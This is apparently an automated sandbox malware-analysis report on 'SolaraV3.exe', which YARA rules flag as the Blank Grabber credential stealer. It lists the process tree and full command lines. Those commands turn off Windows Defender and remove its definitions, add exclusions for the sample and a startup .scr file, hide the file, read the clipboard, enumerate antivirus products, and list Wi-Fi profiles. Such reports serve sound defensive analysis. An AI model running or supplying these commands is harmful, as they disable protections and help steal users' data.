ad c2 9d 71 6a 3b cd ed e2 76 f7 d5 e9 2b c2 43 fd 3e a4 df f3 51 5d 42 d8 29 12 99 2a 9c Data Ascii: 5S&Hc"oK!-wt^$!T26EQK&QWK^Ie`MLnRx{:<D~y2Tp#e)Og=PAGPB{X&@IWC@\0Z%MkSnTmHFAi[kqHM5#8}(kGHKmPCNVqj;v+C>Q]B)*
2024-10-04 13:33:02 UTC	16384	OUT	Data Raw: 09 80 c9 4b 2d 26 ca 3e d8 42 8f a1 92 ff e1 31 e9 4b fc fc 30 35 bd 5d 48 d2 b4 69 25 1b bf b3 f2 51 c8 14 96 19 a8 f0 82 62 6b 72 18 40 29 ea 06 f4 ae 60 12 43 13 da dc d3 c4 65 1f 34 4f 23 27 34 9a 66 42 c1 de a1 74 34 6a 0f 33 a6 50 a6 e8 c6 8a 46 a1 85 89 24 43 0b 51 6e 63 bb ad 8d 41 8a 27 d1 f7 b9 45 e9 b9 f6 d0 fc 80 d8 f0 c9 e5 f6 bd 3e fe 3b ee e8 da a8 bb 09 f2 48 c5 1c 5c 1d f2 cb 0e 9a 88 9c 5d ef e3 6c 71 df 6c bc 40 8b 90 18 68 46 00 e2 3a 51 1b a1 fd 1d 93 f0 79 69 94 3c d3 d7 81 5c ba e7 81 d2 29 9b 98 04 a8 12 78 4a 32 1a d3 21 94 43 39 c3 1a 16 2e 6c 94 17 6c f5 b5 82 41 d3 01 a0 2f 27 d1 80 04 92 3c ad 15 8a d5 dc 04 ab eb 42 fe e3 7d fd 6f ff d4 75 29 15 8c 3c df 2f 26 88 36 0e c8 b1 9c 15 ce 9a 4c a3 e8 2a 6b af f9 b4 fd 73 77 dd 3d Data Ascii: K-&>B1K05]Hi%Qbkr@)`Ce4O#'4fBt4j3PF$CQncA'E>;H\]lql@hF:Qyi<\)xJ2!C9.llA/'<B}ou)</&6L*ksw=
2024-10-04 13:33:04 UTC	389	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 04 Oct 2024 13:33:04 GMT Content-Type: application/json Content-Length: 1708 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Target ID:	1
Start time:	09:32:16
Start date:	04/10/2024
Path:	C:\Users\user\Desktop\SolaraV3.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\SolaraV3.exe"
Imagebase:	0x7ff6dc700000
File size:	6'315'120 bytes
MD5 hash:	7DD77A8611B56C1ED090293E3AB40F08
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1563577276.000001EA23124000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1563577276.000001EA23122000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:32:16
Start date:	04/10/2024
Path:	C:\Users\user\Desktop\SolaraV3.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\SolaraV3.exe"
Imagebase:	0x7ff6dc700000
File size:	6'315'120 bytes
MD5 hash:	7DD77A8611B56C1ED090293E3AB40F08
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2034413215.000001FC25CB1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:32:18
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:32:18
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:32:18
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:32:18
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()""
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:32:18
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:32:18
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:32:18
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:32:18
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:32:18
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:32:18
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	09:32:18
Start date:	04/10/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()"
Imagebase:	0x7ff6cf300000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	09:32:18
Start date:	04/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	09:32:18
Start date:	04/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	09:32:18
Start date:	04/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
Imagebase:	0x7ff6da5b0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	09:32:18
Start date:	04/10/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff623ef0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	09:32:21
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	09:32:21
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	09:32:22
Start date:	04/10/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Imagebase:	0x7ff768620000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	09:32:22
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	09:32:22
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	09:32:22
Start date:	04/10/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Imagebase:	0x7ff768620000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	09:32:22
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	09:32:22
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	09:32:23
Start date:	04/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	09:32:23
Start date:	04/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6da5b0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	09:32:25
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 2008, Parent PID: 1396

General

Target ID:	32
Start time:	09:32:25
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	09:32:26
Start date:	04/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6da5b0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	09:32:27
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	09:32:27
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	09:32:27
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	09:32:27
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	09:32:27
Start date:	04/10/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"
Imagebase:	0x7ff62c010000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	09:32:27
Start date:	04/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	09:32:28
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 3040, Parent PID: 4892

General

Target ID:	42
Start time:	09:32:28
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6824, Parent PID: 1832

General

Target ID:	43
Start time:	09:32:28
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	09:32:28
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	09:32:28
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	09:32:28
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	09:32:29
Start date:	04/10/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff623ef0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	09:32:29
Start date:	04/10/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff623ef0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	09:32:29
Start date:	04/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase:	0x7ff6da5b0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	09:32:30
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	09:32:30
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7592, Parent PID: 7532

General

Target ID:	53
Start time:	09:32:30
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	09:32:31
Start date:	04/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-Clipboard
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	09:32:31
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	09:32:31
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	09:32:31
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	09:32:31
Start date:	04/10/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff76da80000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	09:32:31
Start date:	04/10/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff623ef0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	09:32:32
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
